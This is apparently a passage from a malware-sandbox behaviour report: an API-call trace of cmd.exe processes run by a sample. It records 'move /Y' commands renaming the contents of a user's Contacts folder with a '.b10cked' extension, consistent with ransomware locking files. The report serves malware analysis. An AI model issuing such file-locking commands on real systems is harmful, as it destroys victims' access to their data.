[0219.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.359] GetUserDefaultLCID () returned 0x409 [0219.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0219.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f918, cchData=128 | out: lpLCData="1") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0219.360] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.361] GetConsoleTitleW (in: lpConsoleTitle=0x3308d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.361] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0219.361] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0219.361] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0219.362] _wcsicmp (_String1="move", _String2=")") returned 68 [0219.362] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0219.362] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0219.362] _wcsicmp (_String1="IF", _String2="move") returned -4 [0219.362] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0219.362] _wcsicmp (_String1="REM", _String2="move") returned 5 [0219.362] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0219.365] GetConsoleTitleW (in: lpConsoleTitle=0x12f610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.365] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0219.365] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0219.365] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0219.365] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="CD") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="REN") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="SET") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0219.365] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0219.365] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0219.365] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0219.365] _wcsicmp (_String1="move", _String2="MD") returned 11 [0219.365] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0219.365] _wcsicmp (_String1="move", _String2="RD") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0219.365] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0219.365] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0219.365] _wcsicmp (_String1="move", _String2="VER") returned -9 [0219.365] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0219.365] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0219.365] _wcsicmp (_String1="move", _String2="START") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0219.366] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0219.366] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0219.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.367] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f3cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.368] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0219.368] _wcsicmp (_String1="LODKDA~1.CON", _String2=".") returned 62 [0219.368] _wcsicmp (_String1="LODKDA~1.CON", _String2="..") returned 62 [0219.368] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\lodkda~1.con")) returned 0x20 [0219.369] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.369] SetErrorMode (uMode=0x0) returned 0x0 [0219.369] SetErrorMode (uMode=0x1) returned 0x0 [0219.369] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", nBufferLength=0x104, lpBuffer=0x12ed54, lpFilePart=0x12ed3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", lpFilePart=0x12ed3c*="LODKDA~1.CON") returned 0x26 [0219.369] SetErrorMode (uMode=0x0) returned 0x1 [0219.369] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0219.369] _wcsicmp (_String1="LODKDA~1.CON", _String2=".") returned 62 [0219.369] _wcsicmp (_String1="LODKDA~1.CON", _String2="..") returned 62 [0219.369] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\lodkda~1.con")) returned 0x20 [0219.369] SetErrorMode (uMode=0x0) returned 0x0 [0219.369] SetErrorMode (uMode=0x1) returned 0x0 [0219.369] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", nBufferLength=0x104, lpBuffer=0x12f1d0, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", lpFilePart=0x12ef68*="LODKDA~1.CON") returned 0x26 [0219.369] SetErrorMode (uMode=0x0) returned 0x1 [0219.369] SetErrorMode (uMode=0x0) returned 0x0 [0219.369] SetErrorMode (uMode=0x1) returned 0x0 [0219.370] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12f3d8, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", lpFilePart=0x12ef68*="lodkd auftnm.contact.b10cked") returned 0x36 [0219.370] SetErrorMode (uMode=0x0) returned 0x1 [0219.370] SetLastError (dwErrCode=0x0) [0219.370] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.b10cked")) returned 0xffffffff [0219.370] GetLastError () returned 0x2 [0219.370] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", fInfoLevelId=0x1, lpFindFileData=0x12e8e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8e4) returned 0x330e50 [0219.370] FindNextFileW (in: hFindFile=0x330e50, lpFindFileData=0x12e8e4 | out: lpFindFileData=0x12e8e4) returned 0 [0219.371] GetLastError () returned 0x12 [0219.371] FindClose (in: hFindFile=0x330e50 | out: hFindFile=0x330e50) returned 1 [0219.372] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", fInfoLevelId=0x1, lpFindFileData=0x341bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341bd0) returned 0x330e50 [0219.372] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", lpFilePart=0x0) returned 0x36 [0219.373] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0219.373] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact")) returned 0x20 [0219.373] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.b10cked"), dwFlags=0x3) returned 1 [0219.373] FindClose (in: hFindFile=0x330e50 | out: hFindFile=0x330e50) returned 1 [0219.373] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb30 | out: _Buffer=" 1") returned 9 [0219.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.373] GetFileType (hFile=0x7) returned 0x2 [0219.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12eabc | out: lpMode=0x12eabc) returned 1 [0219.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eaf0 | out: lpConsoleScreenBufferInfo=0x12eaf0) returned 1 [0219.408] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0219.408] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x12eb30 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0219.408] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eb14, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x12eb14*=0x1a) returned 1 [0219.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.409] SetConsoleInputExeNameW () returned 0x1 [0219.409] GetConsoleOutputCP () returned 0x1b5 [0219.409] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.409] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.409] exit (_Code=0) Process: id = "568" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xf40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32762 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32763 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32764 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32765 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32766 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32767 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32768 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32769 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32770 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32771 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32826 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32827 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32828 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32829 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 32830 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 32831 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32832 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32833 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32834 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32835 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32836 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32837 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32838 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32839 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32854 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 32855 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32856 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32857 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32858 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32859 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32860 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32861 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 32862 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 32863 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 771 os_tid = 0xe44 [0219.508] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f91c | out: lpSystemTimeAsFileTime=0x22f91c*(dwLowDateTime=0xb7a372e0, dwHighDateTime=0x1d440a9)) [0219.508] GetCurrentProcessId () returned 0xf40 [0219.508] GetCurrentThreadId () returned 0xe44 [0219.508] GetTickCount () returned 0x3d4bc [0219.508] QueryPerformanceCounter (in: lpPerformanceCount=0x22f914 | out: lpPerformanceCount=0x22f914*=27629747886) returned 1 [0219.509] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0219.509] __set_app_type (_Type=0x1) [0219.509] __p__fmode () returned 0x76b331f4 [0219.509] __p__commode () returned 0x76b331fc [0219.509] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0219.509] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0219.509] GetCurrentThreadId () returned 0xe44 [0219.510] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe44) returned 0x38 [0219.510] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.510] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0219.510] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f8ac | out: phkResult=0x22f8ac*=0x0) returned 0x2 [0219.518] VirtualQuery (in: lpAddress=0x22f8e3, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0219.518] GetConsoleOutputCP () returned 0x1b5 [0219.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.518] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0219.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.520] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0219.520] GetEnvironmentStringsW () returned 0x2c0180* [0219.520] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0219.520] GetEnvironmentStringsW () returned 0x2c0180* [0219.520] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0219.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e81c | out: phkResult=0x22e81c*=0x40) returned 0x0 [0219.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0xa8, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.520] RegQueryValueExW (in: hKey=0x40, 